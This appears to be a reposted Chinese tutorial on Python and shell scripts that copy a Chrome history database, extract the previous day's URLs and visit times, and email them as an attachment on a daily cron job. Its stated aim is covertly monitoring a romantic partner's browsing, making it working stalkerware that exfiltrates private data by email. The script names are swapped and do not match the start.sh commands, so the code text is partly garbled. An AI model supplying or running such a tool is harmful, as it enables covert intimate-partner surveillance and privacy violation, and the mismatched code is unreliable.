2020年,文中通过示例代码介绍的详细详细介绍
优采云 发布时间: 2021-06-14 00:13
2020年,文中通过示例代码介绍的详细详细介绍
Python实时监控网站browsing记录的实现过程详解
更新时间:2020年7月14日15:18:58 作者:我不想停止进食。
这个文章主要介绍Python实时监控网站browsing记录的实现过程。文章通过示例代码对其进行了详细介绍。对大家的学习或工作有一定的参考学习价值,有需要的朋友可以参考。下
要求:
(1)获取前一天你对象chrome浏览历史中的所有URL和访问次数,并存入txt文件
(2)发送这个txt文件到指定的邮箱地址(你的邮箱)
(3)创建例行任务,每天自动完成这些操作,你可以通过邮件查看你的对象每天看到的内容
准备
发送邮件的QQ邮箱
QQ邮箱授权码
SMTP 服务器地址:
接收邮件的邮箱
执行:
(1)首先我们使用DB Browser for SQLite查看History中urls表的数据构成
从表中可以看出,我们想要的url和访问时间在urls.url和urls.last_visit_time中
(2)get_history.py:
# -*- coding: utf-8 -*-
from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.utils import parseaddr, formataddr
import smtplib
import argparse
# 1.文件执行的需要的参数(result.txt)
parser = argparse.ArgumentParser()
parser.add_argument('affix_file',help='the path of the affix')
args = parser.parse_args()
# 2.格式化一个邮件地址和邮件信息
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name, 'utf-8').encode(), addr))
#连接服务器(这里大家好改成自己的!)
from_addr = "771568102@qq.com" #发件人邮箱
password = "xxxxxxxx" #发件人邮箱授权码
to_addr = "2160802033@cnu.edu.cn" #收件人邮箱
smtp_server = "smtp.qq.com" #SMTP服务器地址
#邮件发件人名字、收件人名字、主题
msg = MIMEMultipart()
msg['From'] = _format_addr('风一样的女子 ' % from_addr)
msg['To'] = _format_addr('风一样的男子 ' % to_addr)
msg['Subject'] = Header('chrome历史记录每日更新', 'utf-8').encode()
# 邮件正文是MIMEText:
msg.attach(MIMEText('窥探隐私是犯法的啊!', 'plain', 'utf-8'))
# 添加附件就是加上一个MIMEBase,从本地读取一个txt文件:
with open(args.affix_file, 'r') as f:
# 设置附件的MIME和文件名,这里是py类型:
mime = MIMEBase('result', 'txt', filename='result.txt')
# 加上必要的头信息:
mime.add_header('Content-Disposition', 'attachment', filename='result.txt')
mime.add_header('Content-ID', '')
mime.add_header('X-Attachment-Id', '0')
# 把附件的内容读进来:
mime.set_payload(f.read())
# 用Base64编码:
encoders.encode_base64(mime)
# 添加到MIMEMultipart:
msg.attach(mime)
#3.通过SMTP发送出去
server = smtplib.SMTP(smtp_server, 25)
server.set_debuglevel(1)
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit()
通过这个脚本,我们可以提取出URL和访问时间并存入
在result.txt中,下图是我得到的部分结果
(3)send_email.py:
# -*- coding: utf-8 -*-
import sqlite3
#大家要改成自己的路径
history_db = '/Users/Marcel/Desktop/tmp/code/chrome_history/History'
# 1.连接history_db
c = sqlite3.connect(history_db)
cursor = c.cursor()
# 2.选取我们想要的网址和访问时间
try:
select_statement = "SELECT url,datetime(last_visit_time/1000000-11644473600,'unixepoch','localtime') AS tm FROM urls WHERE julianday('now') - julianday(tm) < 1 ORDER BY tm;"
cursor.execute(select_statement)
except sqlite3.OperationalError:
print("[!] The database is locked! Please exit Chrome and run the script again.")
quit()
# 3.将网址和访问时间存入result.txt文件
results = cursor.fetchall()
with open('/Users/Marcel/Desktop/tmp/code/chrome_history/result.txt','w') as f:#改成自己的路径
for i in range(len(results)):
f.write(results[i][1]+'\n')
f.write(results[i][0]+'\n')
通过这个脚本,我们可以将result.txt作为附件发送到指定邮箱
地址,下图是我得到的部分结果
(4)./start.sh: 其实前面几个脚本已经完成了我们的任务,但是每次执行这么多脚本
这太麻烦了。我们可以将这些脚本的执行语句组织成一个shell脚本。
cp /Users/Marcel/Library/Application\ Support/Google/Chrome/Default/History /Users/Marcel/Desktop/tmp/code/chrome_history/
python /Users/Marcel/Desktop/tmp/code/chrome_history/get_history.py
python /Users/Marcel/Desktop/tmp/code/chrome_history/send_mail.py /Users/Marcel/Desktop/tmp/code/chrome_history/result.txt
这样,如果我们在终端执行./start.sh,系统就会帮我们依次执行这三个语句
注意:由于crontab命令需要绝对路径,所以这里的路径是绝对路径
(5)crontab:如果你使用这个命令,系统会在电脑开机并连接互联网时自动执行,然后将结果发送到你的邮箱
使用方法:在终端输入crontab -e,使用vim输入如下一行代码。
20 14 * * * /Users/Marcel/Desktop/tmp/code/chrome_history/start.sh
注意:前两个数字是您每天执行此脚本的时间。我在这里设置了 14:20。
我再说一遍重要的,一定要写绝对路径! !
以上是本文的全部内容。希望对大家的学习有所帮助,也希望大家多多支持Scripthome。